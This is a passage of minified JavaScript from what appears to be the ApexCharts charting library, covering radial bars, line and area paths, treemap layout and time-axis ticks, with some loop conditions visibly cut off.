m=!1;a.config.plotOptions.radialBar.inverseOrder&&(m=!0);for(var f=m?e.series.length-1:0;m?f>=0:f100?100:e.series[f])/100,w=Math.round(this.totalAngle*A)+this.startAngle,M=void 0;a.globals.dataChanged&&(y=this.startAngle,M=Math.round(this.totalAngle*k.negToZero(a.globals.previousPaths[f])/100)+y),Math.abs(w)+Math.abs(b)>=360&&(w-=.01),Math.abs(M)+Math.abs(y)>=360&&(M-=.01);var j=w-b,C=Array.isArray(a.config.stroke.dashArray)?a.config.stroke.dashArray[f]:a.config.stroke.dashArray,P=n.drawPath({d:"",stroke:g,strokeWidth:o,fill:"none",fillOpacity:a.config.fill.opacity,classes:"apexcharts-radialbar-area apexcharts-radialbar-slice-"+f,strokeDashArray:C});if(S.setAttrs(P.node,{"data:angle":j,"data:value":e.series[f]}),a.config.chart.dropShadow.enabled){var B=a.config.chart.dropShadow;t.dropShadow(P,B,f)}t.setSelectionFilter(P,0,f),this.addListeners(P,this.radialDataLabels),v.add(P),P.attr({index:0,j:f});var T=0;!this.initialAnim||a.globals.resized||a.globals.dataChanged||(T=a.config.chart.animations.speed),a.globals.dataChanged&&(T=a.config.chart.animations.dynamicAnimation.speed),this.animDur=T/(1.2*e.series.length)+this.animDur,this.animBeginArr.push(this.animDur),this.animatePaths(P,{centerX:e.centerX,centerY:e.centerY,endAngle:w,startAngle:b,prevEndAngle:M,prevStartAngle:y,size:e.size,i:f,totalItems:2,animBeginArr:this.animBeginArr,dur:T,shouldSetPrevPaths:!0,easing:a.globals.easing})}return{g:r,elHollow:c,dataLabels:p}}},{key:"drawHollow",value:function(e){var a=new S(this.ctx).drawCircle(2*e.size);return a.attr({class:"apexcharts-radialbar-hollow",cx:e.centerX,cy:e.centerY,r:e.size,fill:e.fill}),a}},{key:"drawHollowImage",value:function(e,a,n,i){var t=this.w,r=new L(this.ctx),o=k.randomId(),s=t.config.plotOptions.radialBar.hollow.image;if(t.config.plotOptions.radialBar.hollow.imageClipped)r.clippedImgArea({width:n,height:n,image:s,patternID:"pattern".concat(t.globals.cuid).concat(o)}),i="url(#pattern".concat(t.globals.cuid).concat(o,")");else{var l=t.config.plotOptions.radialBar.hollow.imageWidth,u=t.config.plotOptions.radialBar.hollow.imageHeight;if(void 0===l&&void 0===u){var c=t.globals.dom.Paper.image(s).loaded((function(a){this.move(e.centerX-a.width/2+t.config.plotOptions.radialBar.hollow.imageOffsetX,e.centerY-a.height/2+t.config.plotOptions.radialBar.hollow.imageOffsetY)}));a.add(c)}else{var d=t.globals.dom.Paper.image(s).loaded((function(a){this.move(e.centerX-l/2+t.config.plotOptions.radialBar.hollow.imageOffsetX,e.centerY-u/2+t.config.plotOptions.radialBar.hollow.imageOffsetY),this.size(l,u)}));a.add(d)}}return i}},{key:"getStrokeWidth",value:function(e){var a=this.w;return 
e.size*(100-parseInt(a.config.plotOptions.radialBar.hollow.size,10))/100/(e.series.length+1)-this.margin}}]),n}(),Le=function(){function e(a){s(this,e),this.w=a.w,this.lineCtx=a}return u(e,[{key:"sameValueSeriesFix",value:function(e,a){var n=this.w;if("line"===n.config.chart.type&&("gradient"===n.config.fill.type||"gradient"===n.config.fill.type[e])&&new A(this.lineCtx.ctx,n).seriesHaveSameValues(e)){var i=a[e].slice();i[i.length-1]=i[i.length-1]+1e-6,a[e]=i}return a}},{key:"calculatePoints",value:function(e){var a=e.series,n=e.realIndex,i=e.x,t=e.y,r=e.i,o=e.j,s=e.prevY,l=this.w,u=[],c=[];if(0===o){var d=this.lineCtx.categoryAxisCorrection+l.config.markers.offsetX;l.globals.isXNumeric&&(d=(l.globals.seriesX[n][0]-l.globals.minX)/this.lineCtx.xRatio+l.config.markers.offsetX),u.push(d),c.push(k.isNumber(a[r][0])?s+l.config.markers.offsetY:null),u.push(i+l.config.markers.offsetX),c.push(k.isNumber(a[r][o+1])?t+l.config.markers.offsetY:null)}else u.push(i+l.config.markers.offsetX),c.push(k.isNumber(a[r][o+1])?t+l.config.markers.offsetY:null);return{x:u,y:c}}},{key:"checkPreviousPaths",value:function(e){for(var a=e.pathFromLine,n=e.pathFromArea,i=e.realIndex,t=this.w,r=0;r0&&parseInt(o.realIndex,10)===parseInt(i,10)&&("line"===o.type?(this.lineCtx.appendPathFrom=!1,a=t.globals.previousPaths[r].paths[0].d):"area"===o.type&&(this.lineCtx.appendPathFrom=!1,n=t.globals.previousPaths[r].paths[0].d,t.config.stroke.show&&t.globals.previousPaths[r].paths[1]&&(a=t.globals.previousPaths[r].paths[1].d)))}return{pathFromLine:a,pathFromArea:n}}},{key:"determineFirstPrevY",value:function(e){var a=e.i,n=e.series,i=e.prevY,t=e.lineYPosition,r=this.w;if(void 0!==n[a][0])i=(t=r.config.chart.stacked&&a>0?this.lineCtx.prevSeriesY[a-1][0]:this.lineCtx.zeroY)-n[a][0]/this.lineCtx.yRatio[this.lineCtx.yaxisIndex]+2*(this.lineCtx.isReversed?n[a][0]/this.lineCtx.yRatio[this.lineCtx.yaxisIndex]:0);else if(r.config.chart.stacked&&a>0&&void 0===n[a][0])for(var o=a-1;o>=0;o--)if(null!==n[o][0]&&void 0!==n[o][0]){i=t=this.lineCtx.prevSeriesY[o][0];break}return{prevY:i,lineYPosition:t}}}]),e}(),ze=function(){function e(a,n,i){s(this,e),this.ctx=a,this.w=a.w,this.xyRatios=n,this.pointsChart=!("bubble"!==this.w.config.chart.type&&"scatter"!==this.w.config.chart.type)||i,this.scatter=new N(this.ctx),this.noNegatives=this.w.globals.minX===Number.MAX_VALUE,this.lineHelpers=new Le(this),this.markers=new z(this.ctx),this.prevSeriesY=[],this.categoryAxisCorrection=0,this.yaxisIndex=0}return u(e,[{key:"draw",value:function(e,a,n){var i=this.w,t=new S(this.ctx),r=i.globals.comboCharts?a:i.config.chart.type,o=t.group({class:"apexcharts-".concat(r,"-series apexcharts-plot-series")}),s=new A(this.ctx,i);this.yRatio=this.xyRatios.yRatio,this.zRatio=this.xyRatios.zRatio,this.xRatio=this.xyRatios.xRatio,this.baseLineY=this.xyRatios.baseLineY,e=s.getLogSeries(e),this.yRatio=s.getLogYRatios(this.yRatio);for(var l=[],u=0;u0&&(p=(i.globals.seriesX[c][0]-i.globals.minX)/this.xRatio),h.push(p);var m,f=p,v=f,g=this.zeroY;g=this.lineHelpers.determineFirstPrevY({i:u,series:e,prevY:g,lineYPosition:0}).prevY,d.push(g),m=g;var b=this._calculatePathsFrom({series:e,i:u,realIndex:c,prevX:v,prevY:g}),k=this._iterateOverDataPoints({series:e,realIndex:c,i:u,x:p,y:1,pX:f,pY:m,pathsFrom:b,linePaths:[],areaPaths:[],seriesIndex:n,lineYPosition:0,xArrj:h,yArrj:d});this._handlePaths({type:r,realIndex:c,i:u,paths:k}),this.elSeries.add(this.elPointsMain),this.elSeries.add(this.elDataLabelsWrap),l.push(this.elSeries)}if(i.config.chart.stacked)for(var 
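/* Line/area draw(): each series is rendered into its own group; for stacked charts the groups are
appended in reverse (the loop below walks the array from the end) so the first series ends up
painted on top. */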
y=l.length;y>0;y--)o.add(l[y-1]);else for(var x=0;x1&&(this.yaxisIndex=n),this.isReversed=i.config.yaxis[this.yaxisIndex]&&i.config.yaxis[this.yaxisIndex].reversed,this.zeroY=i.globals.gridHeight-this.baseLineY[this.yaxisIndex]-(this.isReversed?i.globals.gridHeight:0)+(this.isReversed?2*this.baseLineY[this.yaxisIndex]:0),this.areaBottomY=this.zeroY,(this.zeroY>i.globals.gridHeight||"end"===i.config.plotOptions.area.fillTo)&&(this.areaBottomY=i.globals.gridHeight),this.categoryAxisCorrection=this.xDivision/2,this.elSeries=t.group({class:"apexcharts-series",seriesName:k.escapeString(i.globals.seriesNames[n])}),this.elPointsMain=t.group({class:"apexcharts-series-markers-wrap","data:realIndex":n}),this.elDataLabelsWrap=t.group({class:"apexcharts-datalabels","data:realIndex":n});var r=e[a].length===i.globals.dataPoints;this.elSeries.attr({"data:longestSeries":r,rel:a+1,"data:realIndex":n}),this.appendPathFrom=!0}},{key:"_calculatePathsFrom",value:function(e){var a,n,i,t,r=e.series,o=e.i,s=e.realIndex,l=e.prevX,u=e.prevY,c=this.w,d=new S(this.ctx);if(null===r[o][0]){for(var h=0;h0){var p=this.lineHelpers.checkPreviousPaths({pathFromLine:i,pathFromArea:t,realIndex:s});i=p.pathFromLine,t=p.pathFromArea}return{prevX:l,prevY:u,linePath:a,areaPath:n,pathFromLine:i,pathFromArea:t}}},{key:"_handlePaths",value:function(e){var a=e.type,n=e.realIndex,i=e.i,t=e.paths,o=this.w,s=new S(this.ctx),l=new L(this.ctx);this.prevSeriesY.push(t.yArrj),o.globals.seriesXvalues[n]=t.xArrj,o.globals.seriesYvalues[n]=t.yArrj;var u=o.config.forecastDataPoints;if(u.count>0){var c=o.globals.seriesXvalues[n][o.globals.seriesXvalues[n].length-u.count-1],d=s.drawRect(c,0,o.globals.gridWidth,o.globals.gridHeight,0);o.globals.dom.elForecastMask.appendChild(d.node);var h=s.drawRect(0,0,c,o.globals.gridHeight,0);o.globals.dom.elNonForecastMask.appendChild(h.node)}this.pointsChart||o.globals.delayedElements.push({el:this.elPointsMain.node,index:n});var p={i:i,realIndex:n,animationDelay:i,initialSpeed:o.config.chart.animations.speed,dataChangeSpeed:o.config.chart.animations.dynamicAnimation.speed,className:"apexcharts-".concat(a)};if("area"===a)for(var m=l.fillPath({seriesNumber:n}),f=0;f0){var x=s.renderPaths(k);x.node.setAttribute("stroke-dasharray",u.dashArray),u.strokeWidth&&x.node.setAttribute("stroke-width",u.strokeWidth),this.elSeries.add(x),x.attr("clip-path","url(#forecastMask".concat(o.globals.cuid,")")),y.attr("clip-path","url(#nonForecastMask".concat(o.globals.cuid,")"))}}}}},{key:"_iterateOverDataPoints",value:function(e){for(var a=e.series,n=e.realIndex,i=e.i,t=e.x,r=e.y,o=e.pX,s=e.pY,l=e.pathsFrom,u=e.linePaths,c=e.areaPaths,d=e.seriesIndex,h=e.lineYPosition,p=e.xArrj,m=e.yArrj,f=this.w,v=new S(this.ctx),g=this.yRatio,b=l.prevY,y=l.linePath,x=l.areaPath,A=l.pathFromLine,w=l.pathFromArea,M=k.isNumber(f.globals.minYArr[n])?f.globals.minYArr[n]:f.globals.minY,j=f.globals.dataPoints>1?f.globals.dataPoints-1:f.globals.dataPoints,C=0;C0&&f.globals.collapsedSeries.length-1){a--;break}return a>=0?a:0}(i-1)][C+1]:this.zeroY,r=P?h-M/g[this.yaxisIndex]+2*(this.isReversed?M/g[this.yaxisIndex]:0):h-a[i][C+1]/g[this.yaxisIndex]+2*(this.isReversed?a[i][C+1]/g[this.yaxisIndex]:0),p.push(t),m.push(r);var 
T=this.lineHelpers.calculatePoints({series:a,x:t,y:r,realIndex:n,i:i,j:C,prevY:b}),L=this._createPaths({series:a,i:i,realIndex:n,j:C,x:t,y:r,pX:o,pY:s,linePath:y,areaPath:x,linePaths:u,areaPaths:c,seriesIndex:d});c=L.areaPaths,u=L.linePaths,o=L.pX,s=L.pY,x=L.areaPath,y=L.linePath,this.appendPathFrom&&(A+=v.line(t,this.zeroY),w+=v.line(t,this.zeroY)),this.handleNullDataPoints(a,T,i,C,n),this._handleMarkersAndLabels({pointsPos:T,series:a,x:t,y:r,prevY:b,i:i,j:C,realIndex:n})}return{yArrj:m,xArrj:p,pathFromArea:w,areaPaths:c,pathFromLine:A,linePaths:u}}},{key:"_handleMarkersAndLabels",value:function(e){var a=e.pointsPos;e.series,e.x,e.y,e.prevY;var n=e.i,i=e.j,t=e.realIndex,r=this.w,o=new E(this.ctx);if(this.pointsChart)this.scatter.draw(this.elSeries,i,{realIndex:t,pointsPos:a,zRatio:this.zRatio,elParent:this.elPointsMain});else{r.globals.series[n].length>1&&this.elPointsMain.node.classList.add("apexcharts-element-hidden");var s=this.markers.plotChartMarkers(a,t,i+1);null!==s&&this.elPointsMain.add(s)}var l=o.drawDataLabel(a,t,i+1,null);null!==l&&this.elDataLabelsWrap.add(l)}},{key:"_createPaths",value:function(e){var a=e.series,n=e.i,i=e.realIndex,t=e.j,r=e.x,o=e.y,s=e.pX,l=e.pY,u=e.linePath,c=e.areaPath,d=e.linePaths,h=e.areaPaths,p=e.seriesIndex,m=this.w,f=new S(this.ctx),v=m.config.stroke.curve,g=this.areaBottomY;if(Array.isArray(m.config.stroke.curve)&&(v=Array.isArray(p)?m.config.stroke.curve[p[n]]:m.config.stroke.curve[n]),"smooth"===v){var b=.35*(r-s);m.globals.hasNullValues?(null!==a[n][t]&&(null!==a[n][t+1]?(u=f.move(s,l)+f.curve(s+b,l,r-b,o,r+1,o),c=f.move(s+1,l)+f.curve(s+b,l,r-b,o,r+1,o)+f.line(r,g)+f.line(s,g)+"z"):(u=f.move(s,l),c=f.move(s,l)+"z")),d.push(u),h.push(c)):(u+=f.curve(s+b,l,r-b,o,r,o),c+=f.curve(s+b,l,r-b,o,r,o)),s=r,l=o,t===a[n].length-2&&(c=c+f.curve(s,l,r,o,r,g)+f.move(r,o)+"z",m.globals.hasNullValues||(d.push(u),h.push(c)))}else{if(null===a[n][t+1]){u+=f.move(r,o);var k=m.globals.isXNumeric?(m.globals.seriesX[i][t]-m.globals.minX)/this.xRatio:r-this.xDivision;c=c+f.line(k,g)+f.move(r,o)+"z"}null===a[n][t]&&(u+=f.move(r,o),c+=f.move(r,g)),"stepline"===v?(u=u+f.line(r,null,"H")+f.line(null,o,"V"),c=c+f.line(r,null,"H")+f.line(null,o,"V")):"straight"===v&&(u+=f.line(r,o),c+=f.line(r,o)),t===a[n].length-2&&(c=c+f.line(r,g)+f.move(r,o)+"z",d.push(u),h.push(c))}return{linePaths:d,areaPaths:h,pX:s,pY:l,linePath:u,areaPath:c}}},{key:"handleNullDataPoints",value:function(e,a,n,i,t){var r=this.w;if(null===e[n][i]&&r.config.markers.showNullDataPoints||1===e[n].length){var o=this.markers.plotChartMarkers(a,t,i+1,this.strokeWidth-r.config.markers.strokeWidth/2,!0);null!==o&&this.elPointsMain.add(o)}}}]),e}();window.TreemapSquared={},window.TreemapSquared.generate=function(){function e(a,n,i,t){this.xoffset=a,this.yoffset=n,this.height=t,this.width=i,this.shortestEdge=function(){return Math.min(this.height,this.width)},this.getCoordinates=function(e){var a,n=[],i=this.xoffset,t=this.yoffset,o=r(e)/this.height,s=r(e)/this.width;if(this.width>=this.height)for(a=0;a=this.height){var i=a/this.height,t=this.width-i;n=new e(this.xoffset+i,this.yoffset,t,this.height)}else{var r=a/this.width,o=this.height-r;n=new e(this.xoffset,this.yoffset+r,this.width,o)}return n}}function a(a,i,t,o,s){return o=void 0===o?0:o,s=void 0===s?0:s,function(e){var a,n,i=[];for(a=0;a=i(t,n))}(a,l=e[0],s)?(a.push(l),n(e.slice(1),a,t,o)):(u=t.cutArea(r(a),o),o.push(t.getCoordinates(a)),n(e,[],u,o)),o;o.push(t.getCoordinates(a))}function i(e,a){var 
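/* TreemapSquared: squarified treemap layout. getCoordinates() lays the current row of cells along
the container's shorter edge, cutArea() removes the consumed strip, and the worst-aspect-ratio
test below, max(w^2*max/s^2, s^2/(w^2*min)) for shortest edge w, row sum s and min/max cell areas,
decides whether adding the next cell to the row would worsen its aspect ratios. */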
n=Math.min.apply(Math,e),i=Math.max.apply(Math,e),t=r(e);return Math.max(Math.pow(a,2)*i/Math.pow(t,2),Math.pow(t,2)/(Math.pow(a,2)*n))}function t(e){return e&&e.constructor===Array}function r(e){var a,n=0;for(a=0;at-n&&s.width<=r-i){var l=o.rotateAroundCenter(e.node);e.node.setAttribute("transform","rotate(-90 ".concat(l.x," ").concat(l.y,")"))}}},{key:"animateTreemap",value:function(e,a,n,i){var t=new y(this.ctx);t.animateRect(e,{x:a.x,y:a.y,width:a.width,height:a.height},{x:n.x,y:n.y,width:n.width,height:n.height},i,(function(){t.animationCompleted(e)}))}}]),e}(),Ke=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.timeScaleArray=[],this.utc=this.w.config.xaxis.labels.datetimeUTC}return u(e,[{key:"calculateTimeScaleTicks",value:function(e,a){var n=this,i=this.w;if(i.globals.allSeriesCollapsed)return i.globals.labels=[],i.globals.timescaleLabels=[],[];var t=new H(this.ctx),o=(a-e)/864e5;this.determineInterval(o),i.globals.disableZoomIn=!1,i.globals.disableZoomOut=!1,o<.00011574074074074075?i.globals.disableZoomIn=!0:o>5e4&&(i.globals.disableZoomOut=!0);var s=t.getTimeUnitsfromTimestamp(e,a,this.utc),l=i.globals.gridWidth/o,u=l/24,c=u/60,d=c/60,h=Math.floor(24*o),p=Math.floor(1440*o),m=Math.floor(86400*o),f=Math.floor(o),v=Math.floor(o/30),g=Math.floor(o/365),b={minMillisecond:s.minMillisecond,minSecond:s.minSecond,minMinute:s.minMinute,minHour:s.minHour,minDate:s.minDate,minMonth:s.minMonth,minYear:s.minYear},k={firstVal:b,currentMillisecond:b.minMillisecond,currentSecond:b.minSecond,currentMinute:b.minMinute,currentHour:b.minHour,currentMonthDate:b.minDate,currentDate:b.minDate,currentMonth:b.minMonth,currentYear:b.minYear,daysWidthOnXAxis:l,hoursWidthOnXAxis:u,minutesWidthOnXAxis:c,secondsWidthOnXAxis:d,numberOfSeconds:m,numberOfMinutes:p,numberOfHours:h,numberOfDays:f,numberOfMonths:v,numberOfYears:g};switch(this.tickInterval){case"years":this.generateYearScale(k);break;case"months":case"half_year":this.generateMonthScale(k);break;case"months_days":case"months_fortnight":case"days":case"week_days":this.generateDayScale(k);break;case"hours":this.generateHourScale(k);break;case"minutes_fives":case"minutes":this.generateMinuteScale(k);break;case"seconds_tens":case"seconds_fives":case"seconds":this.generateSecondScale(k)}var y=this.timeScaleArray.map((function(e){var a={position:e.position,unit:e.unit,year:e.year,day:e.day?e.day:1,hour:e.hour?e.hour:0,month:e.month+1};return"month"===e.unit?r(r({},a),{},{day:1,value:e.value+1}):"day"===e.unit||"hour"===e.unit?r(r({},a),{},{value:e.value}):"minute"===e.unit?r(r({},a),{},{value:e.value,minute:e.value}):"second"===e.unit?r(r({},a),{},{value:e.value,minute:e.minute,second:e.second}):e}));return y.filter((function(e){var a=1,t=Math.ceil(i.globals.gridWidth/120),r=e.value;void 0!==i.config.xaxis.tickAmount&&(t=i.config.xaxis.tickAmount),y.length>t&&(a=Math.floor(y.length/t));var 
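/* Time scale ticks: calculateTimeScaleTicks() measures the visible range in days,
determineInterval() maps that to a tick unit (years down to seconds), and the filter here thins
the generated labels to roughly one per 120px of grid width (Math.ceil(gridWidth/120), or
xaxis.tickAmount when configured). */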
o=!1,s=!1;switch(n.tickInterval){case"years":"year"===e.unit&&(o=!0);break;case"half_year":a=7,"year"===e.unit&&(o=!0);break;case"months":a=1,"year"===e.unit&&(o=!0);break;case"months_fortnight":a=15,"year"!==e.unit&&"month"!==e.unit||(o=!0),30===r&&(s=!0);break;case"months_days":a=10,"month"===e.unit&&(o=!0),30===r&&(s=!0);break;case"week_days":a=8,"month"===e.unit&&(o=!0);break;case"days":a=1,"month"===e.unit&&(o=!0);break;case"hours":"day"===e.unit&&(o=!0);break;case"minutes_fives":case"seconds_fives":r%5!=0&&(s=!0);break;case"seconds_tens":r%10!=0&&(s=!0)}if("hours"===n.tickInterval||"minutes_fives"===n.tickInterval||"seconds_tens"===n.tickInterval||"seconds_fives"===n.tickInterval){if(!s)return!0}else if((r%a==0||o)&&!s)return!0}))}},{key:"recalcDimensionsBasedOnFormat",value:function(e,a){var n=this.w,i=this.formatDates(e),t=this.removeOverlappingTS(i);n.globals.timescaleLabels=t.slice(),new de(this.ctx).plotCoords()}},{key:"determineInterval",value:function(e){var a=24*e,n=60*a;switch(!0){case e/365>5:this.tickInterval="years";break;case e>800:this.tickInterval="half_year";break;case e>180:this.tickInterval="months";break;case e>90:this.tickInterval="months_fortnight";break;case e>60:this.tickInterval="months_days";break;case e>30:this.tickInterval="week_days";break;case e>2:this.tickInterval="days";break;case a>2.4:this.tickInterval="hours";break;case n>15:this.tickInterval="minutes_fives";break;case n>5:this.tickInterval="minutes";break;case n>1:this.tickInterval="seconds_tens";break;case 60*n>20:this.tickInterval="seconds_fives";break;default:this.tickInterval="seconds"}}},{key:"generateYearScale",value:function(e){var a=e.firstVal,n=e.currentMonth,i=e.currentYear,t=e.daysWidthOnXAxis,r=e.numberOfYears,o=a.minYear,s=0,l=new H(this.ctx),u="year";if(a.minDate>1||a.minMonth>0){var c=l.determineRemainingDaysOfYear(a.minYear,a.minMonth,a.minDate);s=(l.determineDaysOfYear(a.minYear)-c+1)*t,o=a.minYear+1,this.timeScaleArray.push({position:s,value:o,unit:u,year:o,month:k.monthMod(n+1)})}else 1===a.minDate&&0===a.minMonth&&this.timeScaleArray.push({position:s,value:o,unit:u,year:i,month:k.monthMod(n+1)});for(var d=o,h=s,p=0;p1){l=(u.determineDaysOfMonths(i+1,a.minYear)-n+1)*r,s=k.monthMod(i+1);var h=t+d,p=k.monthMod(s),m=s;0===s&&(c="year",m=h,p=1,h+=d+=1),this.timeScaleArray.push({position:l,value:m,unit:c,year:h,month:p})}else this.timeScaleArray.push({position:l,value:s,unit:c,year:t,month:k.monthMod(i)});for(var f=s+1,v=l,g=0,b=1;go.determineDaysOfMonths(a+1,n)?(u=1,s="month",h=a+=1,a):a},d=(24-a.minHour)*t,h=l,p=c(u,n,i);0===a.minHour&&1===a.minDate?(d=0,h=k.monthMod(a.minMonth),s="month",u=a.minDate,r++):1!==a.minDate&&0===a.minHour&&0===a.minMinute&&(d=0,l=a.minDate,h=l,p=c(u=l,n,i)),this.timeScaleArray.push({position:d,value:h,unit:s,year:this._getYear(i,p,0),month:k.monthMod(p),day:u});for(var m=d,f=0;fs.determineDaysOfMonths(a+1,t)&&(f=1,a+=1),{month:a,date:f}},c=function(e,a){return e>s.determineDaysOfMonths(a+1,t)?a+=1:a},d=60-(a.minMinute+a.minSecond/60),h=d*r,p=a.minHour+1,m=p+1;60===d&&(h=0,m=(p=a.minHour)+1);var f=n,v=c(f,i);this.timeScaleArray.push({position:h,value:p,unit:l,day:f,hour:m,year:t,month:k.monthMod(v)});for(var g=h,b=0;b=24&&(m=0,l="day",v=u(f+=1,v).month,v=c(f,v));var y=this._getYear(t,v,0);g=0===m&&0===b?d*r:60*r+g;var x=0===m?f:m;this.timeScaleArray.push({position:g,value:x,unit:l,hour:m,day:f,year:y,month:k.monthMod(v)}),m++}}},{key:"generateMinuteScale",value:function(e){for(var 
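/*
 * The minute and second scale generators that follow emit one tick per unit:
 * the first tick is offset to the first whole unit inside the range, e.g.
 * (60 - seconds - ms / 1000) * secondsWidthOnXAxis pixels for the minute scale,
 * and each later tick advances by the per-unit pixel width, wrapping 60 -> 0
 * and carrying into the hour (and 24 -> 0 into the day). A sketch, assuming
 * precomputed pxPerMinute and pxPerSecond widths:
 *
 *   var pos = (60 - sec - ms / 1000) * pxPerSecond;
 *   for (var m = minute + 1, i = 0; i < numberOfMinutes; i++, m++, pos += pxPerMinute) {
 *     if (m >= 60) { m = 0; hour = (hour + 1) % 24; }
 *     ticks.push({ position: pos, minute: m, hour: hour });
 *   }
 */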
a=e.currentMillisecond,n=e.currentSecond,i=e.currentMinute,t=e.currentHour,r=e.currentDate,o=e.currentMonth,s=e.currentYear,l=e.minutesWidthOnXAxis,u=e.secondsWidthOnXAxis,c=e.numberOfMinutes,d=i+1,h=r,p=o,m=s,f=t,v=(60-n-a/1e3)*u,g=0;g<c;g++)d>=60&&(d=0,24===(f+=1)&&(f=0)),this.timeScaleArray.push({position:v,value:d,unit:"minute",hour:f,minute:d,day:h,year:this._getYear(m,p,0),month:k.monthMod(p)}),v+=l,d++}},{key:"generateSecondScale",value:function(e){for(var a=e.currentMillisecond,n=e.currentSecond,i=e.currentMinute,t=e.currentHour,r=e.currentDate,o=e.currentMonth,s=e.currentYear,l=e.secondsWidthOnXAxis,u=e.numberOfSeconds,c=n+1,d=i,h=r,p=o,m=s,f=t,v=(1e3-a)/1e3*l,g=0;g<u;g++)c>=60&&(c=0,++d>=60&&(d=0,24===++f&&(f=0))),this.timeScaleArray.push({position:v,value:c,unit:"second",hour:f,minute:d,second:c,day:h,year:this._getYear(m,p,0),month:k.monthMod(p)}),v+=l,c++}},{key:"createRawDateString",value:function(e,a){var n=e.year;return 0===e.month&&(e.month=1),n+="-"+("0"+e.month.toString()).slice(-2),"day"===e.unit?n+="day"===e.unit?"-"+("0"+a).slice(-2):"-01":n+="-"+("0"+(e.day?e.day:"1")).slice(-2),"hour"===e.unit?n+="hour"===e.unit?"T"+("0"+a).slice(-2):"T00":n+="T"+("0"+(e.hour?e.hour:"0")).slice(-2),"minute"===e.unit?n+=":"+("0"+a).slice(-2):n+=":"+(e.minute?("0"+e.minute).slice(-2):"00"),"second"===e.unit?n+=":"+("0"+a).slice(-2):n+=":00",this.utc&&(n+=".000Z"),n}},{key:"formatDates",value:function(e){var a=this,n=this.w;return e.map((function(e){var i=e.value.toString(),t=new H(a.ctx),r=a.createRawDateString(e,i),o=t.getDate(t.parseDate(r));if(a.utc||(o=t.getDate(t.parseDateWithTimezone(r))),void 0===n.config.xaxis.labels.format){var s="dd MMM",l=n.config.xaxis.labels.datetimeFormatter;"year"===e.unit&&(s=l.year),"month"===e.unit&&(s=l.month),"day"===e.unit&&(s=l.day),"hour"===e.unit&&(s=l.hour),"minute"===e.unit&&(s=l.minute),"second"===e.unit&&(s=l.second),i=t.formatDate(o,s)}else i=t.formatDate(o,n.config.xaxis.labels.format);return{dateString:r,position:e.position,value:i,unit:e.unit,year:e.year,month:e.month}}))}},{key:"removeOverlappingTS",value:function(e){var a,n=this,i=new S(this.ctx),t=!1;e.length>0&&e[0].value&&e.every((function(a){return a.value.length===e[0].value.length}))&&(t=!0,a=i.getTextRects(e[0].value).width);var r=0,o=e.map((function(o,s){if(s>0&&n.w.config.xaxis.labels.hideOverlappingLabels){var l=t?a:i.getTextRects(e[r].value).width,u=e[r].position;return o.position>u+l+10?(r=s,o):null}return o}));return o.filter((function(e){return null!==e}))}},{key:"_getYear",value:function(e,a,n){return e+Math.floor(a/12)+n}}]),e}(),De=function(){function e(a,n){s(this,e),this.ctx=n,this.w=n.w,this.el=a}return u(e,[{key:"setupElements",value:function(){var e=this.w.globals,a=this.w.config,n=a.chart.type;e.axisCharts=["line","area","bar","rangeBar","candlestick","boxPlot","scatter","bubble","radar","heatmap","treemap"].indexOf(n)>-1,e.xyCharts=["line","area","bar","rangeBar","candlestick","boxPlot","scatter","bubble"].indexOf(n)>-1,e.isBarHorizontal=("bar"===a.chart.type||"rangeBar"===a.chart.type||"boxPlot"===a.chart.type)&&a.plotOptions.bar.horizontal,e.chartClass=".apexcharts"+e.chartID,e.dom.baseEl=this.el,e.dom.elWrap=document.createElement("div"),S.setAttrs(e.dom.elWrap,{id:e.chartClass.substring(1),class:"apexcharts-canvas "+e.chartClass.substring(1)}),this.el.appendChild(e.dom.elWrap),e.dom.Paper=new window.SVG.Doc(e.dom.elWrap),e.dom.Paper.attr({class:"apexcharts-svg","xmlns:data":"ApexChartsNS",transform:"translate(".concat(a.chart.offsetX,", 
").concat(a.chart.offsetY,")")}),e.dom.Paper.node.style.background=a.chart.background,this.setSVGDimensions(),e.dom.elGraphical=e.dom.Paper.group().attr({class:"apexcharts-inner apexcharts-graphical"}),e.dom.elAnnotations=e.dom.Paper.group().attr({class:"apexcharts-annotations"}),e.dom.elDefs=e.dom.Paper.defs(),e.dom.elLegendWrap=document.createElement("div"),e.dom.elLegendWrap.classList.add("apexcharts-legend"),e.dom.elWrap.appendChild(e.dom.elLegendWrap),e.dom.Paper.add(e.dom.elGraphical),e.dom.elGraphical.add(e.dom.elDefs)}},{key:"plotChartType",value:function(e,a){var n=this.w,i=n.config,t=n.globals,r={series:[],i:[]},o={series:[],i:[]},s={series:[],i:[]},l={series:[],i:[]},u={series:[],i:[]},c={series:[],i:[]},d={series:[],i:[]};t.series.map((function(a,h){var p=0;void 0!==e[h].type?("column"===e[h].type||"bar"===e[h].type?(t.series.length>1&&i.plotOptions.bar.horizontal&&console.warn("Horizontal bars are not supported in a mixed/combo chart. Please turn off `plotOptions.bar.horizontal`"),u.series.push(a),u.i.push(h),p++,n.globals.columnSeries=u.series):"area"===e[h].type?(o.series.push(a),o.i.push(h),p++):"line"===e[h].type?(r.series.push(a),r.i.push(h),p++):"scatter"===e[h].type?(s.series.push(a),s.i.push(h)):"bubble"===e[h].type?(l.series.push(a),l.i.push(h),p++):"candlestick"===e[h].type?(c.series.push(a),c.i.push(h),p++):"boxPlot"===e[h].type?(d.series.push(a),d.i.push(h),p++):console.warn("You have specified an unrecognized chart type. Available types for this property are line/area/column/bar/scatter/bubble"),p>1&&(t.comboCharts=!0)):(r.series.push(a),r.i.push(h))}));var h=new ze(this.ctx,a),p=new we(this.ctx,a);this.ctx.pie=new Pe(this.ctx);var m=new Te(this.ctx);this.ctx.rangeBar=new O(this.ctx,a);var f=new Be(this.ctx),v=[];if(t.comboCharts){if(o.series.length>0&&v.push(h.draw(o.series,"area",o.i)),u.series.length>0)if(n.config.chart.stacked){var g=new Ae(this.ctx,a);v.push(g.draw(u.series,u.i))}else this.ctx.bar=new _(this.ctx,a),v.push(this.ctx.bar.draw(u.series,u.i));if(r.series.length>0&&v.push(h.draw(r.series,"line",r.i)),c.series.length>0&&v.push(p.draw(c.series,c.i)),d.series.length>0&&v.push(p.draw(d.series,d.i)),s.series.length>0){var b=new ze(this.ctx,a,!0);v.push(b.draw(s.series,"scatter",s.i))}if(l.series.length>0){var k=new ze(this.ctx,a,!0);v.push(k.draw(l.series,"bubble",l.i))}}else switch(i.chart.type){case"line":v=h.draw(t.series,"line");break;case"area":v=h.draw(t.series,"area");break;case"bar":i.chart.stacked?v=new Ae(this.ctx,a).draw(t.series):(this.ctx.bar=new 